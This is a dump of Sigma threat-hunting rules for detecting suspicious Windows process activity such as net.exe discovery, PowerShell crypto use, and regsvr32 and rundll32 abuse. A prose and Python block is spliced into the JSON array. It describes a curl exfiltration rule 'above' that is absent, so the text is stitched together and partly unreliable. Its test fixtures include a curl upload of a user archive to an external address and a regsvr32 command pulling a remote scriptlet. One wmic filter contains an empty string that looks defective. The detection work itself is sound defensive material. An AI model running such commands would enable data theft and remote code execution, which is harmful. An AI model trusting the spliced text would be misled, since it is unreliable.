    "content": "title: CodePage Modification Via MODE.COM\nid: d48c5ffa-3b02-4c0f-9a9e-3c275650dd0e\nrelated:\n    - id: 12fbff88-16b5-4b42-9754-cd001a789fb3\n      type: derived\nstatus: test\ndescription: |\n    Detects a CodePage modification using the \"mode.com\" utility.\n    This behavior has been used by threat actors behind Dharma ransomware.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mode\n    - https://strontic.github.io/xcyclopedia/library/mode.com-59D1ED51ACB8C3D50F1306FD75F20E99.html\n    - https://www.virustotal.com/gui/file/5e75ef02517afd6e8ba6462b19217dc4a5a574abb33d10eb0f2bab49d8d48c22/behavior\nauthor: Nasreddine Bencherchali (Nextron Systems), Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2024-01-19\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\mode.com'\n        - OriginalFileName: 'MODE.COM'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' con '\n            - ' cp '\n            - ' select='\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_net_execution.yml",
    "content": "title: Net.EXE Execution\nid: 183e7ea8-ac4b-4c23-9aec-b3dac4e401ac\nstatus: test\ndescription: Detects execution of \"Net.EXE\".\nreferences:\n    - https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/\n    - https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html\n    - https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html\n    - https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe\nauthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)\ndate: 2019-01-16\nmodified: 2022-07-11\ntags:\n    - attack.discovery\n    - attack.t1007\n    - attack.t1049\n    - attack.t1018\n    - attack.t1135\n    - attack.t1201\n    - attack.t1069.001\n    - attack.t1069.002\n    - attack.t1087.001\n    - attack.t1087.002\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.s0039\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' accounts'\n            - ' group'\n            - ' localgroup'\n            - ' share'\n            - ' start'\n            - ' stop '\n            - ' user'\n            - ' view'\n    condition: all of selection_*\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_net_quic.yml",
    "content": "title: SMB over QUIC Via Net.EXE\nid: 2238d337-42fb-4971-9a68-63570f2aede4\nrelated:\n    - id: 6df07c3b-8456-4f8b-87bb-fe31ec964cae\n      type: similar\nstatus: test\ndescription: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1570/T1570.md\n    - https://www.trustedsec.com/blog/making-smb-accessible-with-ntlmquic/\nauthor: frack113\ndate: 2023-07-21\ntags:\n    - attack.lateral-movement\n    - attack.t1570\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        CommandLine|contains: '/TRANSPORT:QUIC'\n    condition: all of selection_*\nfalsepositives:\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_office_svchost_parent.yml",
    "content": "title: Suspicious New Instance Of An Office COM Object\nid: 9bdaf1e9-fdef-443b-8081-4341b74a7e28\nstatus: test\ndescription: |\n    Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.\n    This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic\n    - https://github.com/med0x2e/vba2clr\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-13\nmodified: 2023-12-19\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith: '\\svchost.exe'\n        Image|endswith:\n            - '\\eqnedt32.exe'\n            - '\\excel.exe'\n            - '\\msaccess.exe'\n            - '\\mspub.exe'\n            - '\\powerpnt.exe'\n            - '\\visio.exe'\n            - '\\winword.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of office automation via scripting\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_powershell_abnormal_commandline_size.yml",
    "content": "title: Unusually Long PowerShell CommandLine\nid: d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6\nstatus: test\ndescription: Detects unusually long PowerShell command lines with a length of 1000 characters or more\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: oscd.community, Natalia Shornikova\ndate: 2020-10-06\nmodified: 2023-04-14\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_powershell:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n        - Description: 'Windows Powershell'\n        - Product: 'PowerShell Core 6'\n    selection_length:\n        CommandLine|re: '.{1000,}'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_powershell_crypto_namespace.yml",
    "content": "title: Invocation Of Crypto-Classes From The \"Cryptography\" PowerShell Namespace\nid: ad856965-f44d-42a8-945e-bbf7bd03d05a\nstatus: test\ndescription: |\n    Detects the invocation of PowerShell commands with references to classes from the \"System.Security.Cryptography\" namespace.\n    The PowerShell namespace \"System.Security.Cryptography\" provides classes for on-the-fly encryption and decryption.\n    These can be used for example in decrypting malicious payload for defense evasion.\nreferences:\n    - https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography?view=net-8.0\n    - https://blogs.vmware.com/security/2023/11/jupyter-rising-an-update-on-jupyter-infostealer.html\n    - https://www.virustotal.com/gui/file/39102fb7bb6a74a9c8cb6d46419f9015b381199ea8524c1376672b30fffd69d2\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2023-12-01\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1027.010\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cmdlet_namespace:\n        CommandLine|contains: 'System.Security.Cryptography.'\n    selection_cmdlet_classes:\n        CommandLine|contains:\n            - '.AesCryptoServiceProvider'\n            - '.DESCryptoServiceProvider'\n            - '.DSACryptoServiceProvider'\n            - '.RC2CryptoServiceProvider'\n            - '.Rijndael'\n            - '.RSACryptoServiceProvider'\n            - '.TripleDESCryptoServiceProvider'\n    condition: all of selection_*\nfalsepositives:\n    - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_powershell_import_module.yml",
    "content": "title: Import New Module Via PowerShell CommandLine\nid: 4ad74d01-f48c-42d0-b88c-b31efa4d2262\nstatus: test\ndescription: Detects usage of the \"Import-Module\" cmdlet in order to add new Cmdlets to the current PowerShell session\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-7.3\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-5.1\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-09\nmodified: 2023-12-01\ntags:\n    - attack.execution\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cmdlet:\n        CommandLine|contains:\n            - 'Import-Module '\n            - 'ipmo '\n    filter_main_vsstudio:\n        ParentImage|contains:\n            - ':\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_'\n            - ':\\Windows\\System32\\cmd.exe'\n        CommandLine|contains|all:\n            - ':\\Program Files\\Microsoft Visual Studio\\'\n            - 'Tools\\Microsoft.VisualStudio.DevShell.dll'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Depending on the environment, many legitimate scripts will import modules inline. This rule is targeted for hunting purposes.\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_powershell_new_netfirewallrule_allow.yml",
    "content": "title: New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet\nid: 51483085-0cba-46a8-837e-4416496d6971\nrelated:\n    - id: 8d31dd2e-b582-48ca-826e-dcaa2c1ca264\n      type: similar\nstatus: test\ndescription: |\n    Detects calls to the \"New-NetFirewallRule\" cmdlet from PowerShell in order to add a new firewall rule with an \"Allow\" action.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-24---set-a-firewall-rule-using-new-netfirewallrule\n    - https://malware.news/t/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/72170\n    - https://cybersecuritynews.com/rhysida-ransomware-attacking-windows/\nauthor: frack113\ndate: 2024-05-03\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_name:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\powershell_ise.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_args:\n        CommandLine|contains|all:\n            - 'New-NetFirewallRule '\n            - ' -Action '\n            - 'allow'\n    condition: all of selection_*\nfalsepositives:\n    - Administrator script\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_powershell_susp_child_processes.yml",
    "content": "title: Potentially Suspicious PowerShell Child Processes\nid: e4b6d2a7-d8a4-4f19-acbd-943c16d90647\nstatus: test\ndescription: |\n    Detects potentially suspicious child processes spawned by PowerShell.\n    Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands.\nreferences:\n    - https://twitter.com/ankit_anubhav/status/1518835408502620162\nauthor: Florian Roth (Nextron Systems), Tim Shelton\ndate: 2022-04-26\nmodified: 2024-07-16\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\powershell_ise.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        Image|endswith:\n            - '\\bash.exe'\n            - '\\bitsadmin.exe'\n            - '\\certutil.exe'\n            - '\\cscript.exe'\n            - '\\forfiles.exe'\n            - '\\hh.exe'\n            - '\\mshta.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\schtasks.exe'\n            - '\\scrcons.exe'\n            - '\\scriptrunner.exe'\n            - '\\sh.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n    filter_optional_amazon:\n        ParentCommandLine|contains: '\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\'  # AWS Workspaces\n        CommandLine|contains: '\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\'  # AWS Workspaces\n    filter_main_certutil_verify_store:\n        Image|endswith: '\\certutil.exe'\n        CommandLine|contains: '-verifystore '\n    filter_main_wmic:\n        Image|endswith: '\\wmic.exe'\n        CommandLine|contains:\n            - 'qfe list'\n            - 'diskdrive '\n            - 'csproduct '\n            - 'computersystem '\n            - ' os '\n            - ''\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - False positives are to be expected from PowerShell scripts that might make use of additional binaries such as \"mshta\", \"bitsadmin\", etc. Apply additional filters for those scripts.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml",
    "content": "title: Regsvr32.EXE Calling of DllRegisterServer Export Function Implicitly\nid: ce2c44b5-a6ac-412a-afba-9e89326fa972\nrelated:\n    - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e\n      type: similar\nstatus: test\ndescription: |\n    Detects execution of regsvr32 with the silent flag and no other flags on a DLL located in an uncommon or potentially suspicious location.\n    When Regsvr32 is called in such a way, it implicitly calls the DLL export function 'DllRegisterServer'.\nreferences:\n    - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/\n    - https://www.virustotal.com/gui/file/288fc4f954f98d724e6fab32a89477943df5c0e9662cb199a19b90ae0c63aebe/detection\n    - https://learn.microsoft.com/en-us/windows/win32/api/olectl/nf-olectl-dllregisterserver\n    - https://ss64.com/nt/regsvr32.html\nauthor: Andreas Braathen (mnemonic.io), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-17\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_image:\n        - Image|endswith: '\\regsvr32.exe'\n        - OriginalFileName: 'REGSVR32.EXE'\n    selection_cmdline:\n        CommandLine|contains:\n            - ' /s '\n            - ' /e '\n    filter_main_paths:\n        - CommandLine|contains:\n              - ':\\Program Files (x86)'\n              - ':\\Program Files\\'\n              - ':\\Windows\\System32\\'\n              - ':\\Windows\\SysWOW64\\'\n        - CurrentDirectory|contains:\n              - ':\\Program Files (x86)'\n              - ':\\Program Files\\'\n              - ':\\Windows\\System32\\'\n              - ':\\Windows\\SysWOW64\\'\n    filter_main_other_flags:\n        # Note: We filter other flags to keep the logic of the rule\n        CommandLine|contains:\n            - ' /i:'\n            - '/U '\n    filter_main_rpcproxy:\n        ParentCommandLine|endswith: ':\\Windows\\System32\\RpcProxy\\RpcProxy.dll'\n        CommandLine: 'regsvr32 /s rpcproxy.dll'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate usage as part of application installation, but less likely from e.g. temporary paths.\nlevel: medium\n"
  },
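Two of the rules above, "Potential Data Exfiltration Via Curl.EXE" and "Regsvr32.EXE Calling of DllRegisterServer Export Function Implicitly", share the same condition shape (all of selection_* and not 1 of filter_*) and both lean on details that are easy to get wrong when porting them to a SIEM: plain Sigma string matching is case-insensitive, while the `re` modifier is case-sensitive (which is why the curl rule uses a regex for the short `-F`/`-T`/`-d` switches rather than `contains`), and the regsvr32 rule filters on CurrentDirectory as well as CommandLine. The Python below is an added example written for this page, not code from the Sigma project or pySigma: it is a minimal evaluator for only the modifiers these two rules use (endswith, contains, contains|all, re), with the two rules transcribed as dictionaries and run over constructed process_creation events (not real telemetry).

```python
import re

# Minimal evaluator for the Sigma modifiers the two rules use. Plain Sigma string
# matching is case-insensitive; the 're' modifier is case-sensitive, which is why
# the curl rule uses a regex for the short -F/-T/-d switches (lowercase -f is "fail
# silently" and must not match).
def field_matches(value, modifiers, patterns):
    if value is None:
        return False
    if not isinstance(patterns, list):
        patterns = [patterns]
    if "re" in modifiers:
        return any(re.search(p, value) for p in patterns)
    v = value.lower()
    pats = [p.lower() for p in patterns]
    if "endswith" in modifiers:
        results = [v.endswith(p) for p in pats]
    elif "contains" in modifiers:
        results = [p in v for p in pats]
    else:
        results = [v == p for p in pats]
    return all(results) if "all" in modifiers else any(results)


def map_matches(event, field_map):
    """A YAML mapping: every field test must hold (AND)."""
    for key, patterns in field_map.items():
        name, *mods = key.split("|")
        if not field_matches(event.get(name), mods, patterns):
            return False
    return True


def selection_matches(event, selection):
    """A YAML list of mappings is OR-ed; a single mapping is AND-ed."""
    if isinstance(selection, list):
        return any(map_matches(event, m) for m in selection)
    return map_matches(event, selection)


def rule_matches(rule, event):
    """Condition shared by both rules: all of selection_* and not 1 of filter_*."""
    sels = [selection_matches(event, s) for n, s in rule.items() if n.startswith("selection")]
    filt = [selection_matches(event, s) for n, s in rule.items() if n.startswith("filter")]
    return all(sels) and not any(filt)


WIN_PATHS = [":\\Program Files (x86)", ":\\Program Files\\", ":\\Windows\\System32\\", ":\\Windows\\SysWOW64\\"]

# The two rules, transcribed from the YAML above.
RULES = {
    "Potential Data Exfiltration Via Curl.EXE": {
        "selection_img": [{"Image|endswith": "\\curl.exe"}, {"Product": "The curl executable"}],
        "selection_cli": [
            {"CommandLine|contains": [" --form", " --upload-file ", " --data ", " --data-"]},
            {"CommandLine|re": r"\s-[FTd]\s"},
        ],
        "filter_optional_localhost": {"CommandLine|contains": ["://localhost", "://127.0.0.1"]},
    },
    "Regsvr32.EXE Calling of DllRegisterServer Export Function Implicitly": {
        "selection_image": [{"Image|endswith": "\\regsvr32.exe"}, {"OriginalFileName": "REGSVR32.EXE"}],
        "selection_cmdline": {"CommandLine|contains": [" /s ", " /e "]},
        "filter_main_paths": [{"CommandLine|contains": WIN_PATHS}, {"CurrentDirectory|contains": WIN_PATHS}],
        "filter_main_other_flags": {"CommandLine|contains": [" /i:", "/U "]},
        "filter_main_rpcproxy": {
            "ParentCommandLine|endswith": ":\\Windows\\System32\\RpcProxy\\RpcProxy.dll",
            "CommandLine": "regsvr32 /s rpcproxy.dll",
        },
    },
}

# Constructed process_creation events (not real telemetry); 203.0.113.10 is a documentation address.
EVENTS = {
    "curl_upload_external": {"Image": "C:\\Windows\\System32\\curl.exe",
        "CommandLine": 'curl.exe -F "file=@C:\\Users\\bob\\docs.zip" https://203.0.113.10/up'},
    "curl_lowercase_f": {"Image": "C:\\Windows\\System32\\curl.exe",  # -f is "fail silently", not an upload
        "CommandLine": "curl.exe -f -o page.html https://203.0.113.10/"},
    "curl_post_localhost": {"Image": "C:\\Tools\\curl.exe",
        "CommandLine": 'curl.exe --data "q=1" http://127.0.0.1:8080/api'},
    "regsvr32_public_dll": {"Image": "C:\\Windows\\System32\\regsvr32.exe",
        "CommandLine": "regsvr32.exe /s C:\\Users\\Public\\update.dll", "CurrentDirectory": "C:\\Users\\Public\\"},
    "regsvr32_program_files": {"Image": "C:\\Windows\\SysWOW64\\regsvr32.exe",
        "CommandLine": 'regsvr32.exe /s "C:\\Program Files\\Vendor\\vendor.dll"',
        "CurrentDirectory": "C:\\Program Files\\Vendor\\"},
    "regsvr32_scriptlet": {"Image": "C:\\Windows\\System32\\regsvr32.exe",  # /i: belongs to another rule
        "CommandLine": "regsvr32.exe /s /i:http://203.0.113.10/x.sct C:\\Users\\Public\\scrobj.dll",
        "CurrentDirectory": "C:\\Users\\Public\\"},
}


def hunt(events=EVENTS, rules=RULES):
    """Return {event_name: [titles of matching rules]}."""
    return {name: [t for t, r in rules.items() if rule_matches(r, ev)] for name, ev in events.items()}


if __name__ == "__main__":
    for name, hits in hunt().items():
        print(f"{name:24s} -> {hits or 'no match'}")
```

Only `curl_upload_external` and `regsvr32_public_dll` fire: the lowercase `-f` case is rejected by the case-sensitive regex, the localhost POST is dropped by filter_optional_localhost, and the two regsvr32 variants are dropped by the path filter and the `/i:` filter respectively. Note that because the evaluator lower-cases both sides, the Product and OriginalFileName tests behave the way Sigma backends treat them; a port that uses a case-sensitive `contains` for the `--data-` prefixes would silently miss `--DATA-BINARY` while still catching the regex cases.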
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_remote_access_tools_action1_code_exec_and_remote_sessions.yml",
    "content": "title: Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions\nid: aa3168fb-d594-4f93-a92d-7a9ba675b766\nstatus: test\ndescription: |\n    Detects the execution of Action1 in order to execute arbitrary code or establish a remote session.\n\n    Action1 is a powerful Remote Monitoring and Management tool that enables users to execute commands, scripts, and binaries.\n    Through the Action1 web interface, the administrator creates a new policy or an app to establish remote execution and then targets the endpoints on which the agent is installed.\n\n    Hunting Opportunity 1 - Weed Out The Noise\n\n    When threat actors execute a script, a command, or a binary through these new policies and apps, the names of these become visible in the command line during the execution process. Below is an example of the command line that contains the deployment of a binary through a policy named \"test_app_1\":\n\n    ParentCommandLine: \"C:\\WINDOWS\\Action1\\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0\"\n\n    After establishing a baseline, we can split the command line to extract the policy name, group by policy name and inspect the results as a list of frequency occurrences.\n\n    Hunting Opportunity 2 - Remote Sessions Outside Office Hours\n\n    If you have admins within your environment using remote sessions to administer endpoints, you can create a threat-hunting query that filters on the time the sessions were initiated, looking for abnormal activity.\nreferences:\n    - https://twitter.com/Kostastsale/status/1646256901506605063?s=20\n    - https://www.action1.com/documentation/\nauthor: '@kostastsale'\ndate: 2023-04-13\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_app_deployment_exec:\n        ParentImage|endswith: '\\action1_agent.exe'\n        Image|contains: '\\Windows\\Action1\\package_downloads\\'\n    selection_command_exec:\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n        ParentCommandLine|contains:\n            - '\\Action1\\scripts\\Run_Command_'\n            - '\\Action1\\scripts\\Run_PowerShell_'\n    selection_remote_session_init:\n        Image|endswith: '\\agent1_remote.exe'\n    condition: 1 of selection_*\nfalsepositives:\n    - If Action1 is among the approved software in your environment, you might find that this is a noisy query. See description for ideas on how to alter this query and start looking for suspicious activities.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_remote_access_tools_ammyy_admin_execution.yml",
    "content": "title: Remote Access Tool - Ammy Admin Agent Execution\nid: 7da7809e-f3d5-47a3-9d5d-fc9d019caf14\nstatus: test\ndescription: Detects the execution of the Ammy Admin RMM agent for remote management.\nreferences:\n    - https://www.ammyy.com/en/admin_features.html\nauthor: '@kostastsale'\ndate: 2024-08-05\ntags:\n    - attack.execution\n    - attack.persistence\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains: 'AMMYY\\aa_nts.dll\",run'\n    condition: selection\nfalsepositives:\n    - Legitimate use of Ammy Admin RMM agent for remote management by admins.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_remote_access_tools_anyviewer_shell_exec.yml",
    "content": "title: Remote Access Tool - Cmd.EXE Execution via AnyViewer\nid: bc533330-fc29-44c0-b245-7dc6e5939c87\nstatus: test\ndescription: |\n    Detects execution of \"cmd.exe\" via the AnyViewer RMM agent during a remote management session.\nreferences:\n    - https://www.anyviewer.com/help/remote-technical-support.html\nauthor: '@kostastsale'\ndate: 2024-08-03\ntags:\n    - attack.execution\n    - attack.persistence\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\AVCore.exe'\n        ParentCommandLine|contains: 'AVCore.exe\" -d'\n        Image|endswith: '\\cmd.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use for admin activity.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_child_proc.yml",
    "content": "title: Remote Access Tool - ScreenConnect Remote Command Execution - Hunting\nid: d1a401ab-8c47-4e86-a7d8-2460b6a53e4a\nrelated:\n    - id: b1f73849-6329-4069-bc8f-78a604bb8b23\n      type: derived\n    - id: 7b582f1a-b318-4c6a-bf4e-66fe49bf55a5\n      type: derived\nstatus: test\ndescription: |\n    Detects remote binary or command execution via the ScreenConnect Service.\n    Use this rule in order to hunt for potentially anomalous executions originating from ScreenConnect\nreferences:\n    - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-02-23\nmodified: 2024-02-26\ntags:\n    - attack.execution\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\ScreenConnect.ClientService.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate commands launched from ScreenConnect will also trigger this rule. Look for anomalies.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_rundll32_by_ordinal.yml",
    "content": "title: DLL Call by Ordinal Via Rundll32.EXE\nid: e79a9e79-eb72-4e78-a628-0e7e8f59e89c\nstatus: stable\ndescription: Detects calls of DLL exports by ordinal numbers via rundll32.exe.\nreferences:\n    - https://web.archive.org/web/20200530031906/https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/\n    - https://github.com/Neo23x0/DLLRunner\n    - https://twitter.com/cyb3rops/status/1186631731543236608\n    - https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-10-22\nmodified: 2024-07-16\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains:\n            - ',#'\n            - ', #'\n            - '.dll #'  # Sysmon removes , in its log\n            - '.ocx #'  # HermeticWizard\n    filter_optional_edge:\n        CommandLine|contains|all:\n            - 'EDGEHTML.dll'\n            - '#141'\n    filter_optional_vsbuild_dll:\n        ParentImage|contains:\n            - '\\Msbuild\\Current\\Bin\\'\n            - '\\VC\\Tools\\MSVC\\'\n            - '\\Tracker.exe'\n        CommandLine|contains:\n            - '\\FileTracker32.dll,#1'\n            - '\\FileTracker32.dll\",#1'\n            - '\\FileTracker64.dll,#1'\n            - '\\FileTracker64.dll\",#1'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment.\n    - Windows control panel elements have been identified as source (mmc).\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_rundll32_dllregisterserver.yml",
    "content": "title: Rundll32.EXE Calling DllRegisterServer Export Function Explicitly\nid: d81a9fc6-55db-4461-b962-0e78fea5b0ad\nrelated:\n    - id: 2569ed8c-1147-498a-9b8c-2ad3656b10ed # Renamed rundll32\n      type: similar\nstatus: test\ndescription: |\n    Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path.\nreferences:\n    - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/\n    - https://www.virustotal.com/gui/file/94816439312563db982cd038cf77cbc5ef4c7003e3edee86e2b0f99e675ed4ed/behavior\n    - https://learn.microsoft.com/en-us/windows/win32/api/olectl/nf-olectl-dllregisterserver\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2023-10-17\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - detection.threat-hunting\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_image:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cmdline:\n        CommandLine|contains: 'DllRegisterServer'\n    filter_main_legit_paths:\n        CommandLine|contains:\n            - ':\\Program Files (x86)'\n            - ':\\Program Files\\'\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate usage as part of application installation, but less likely from e.g. temporary paths.\n    - Not every instance is considered malicious, but this rule will capture the malicious usages.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/process_creation/proc_creation_win_sc_query.yml",
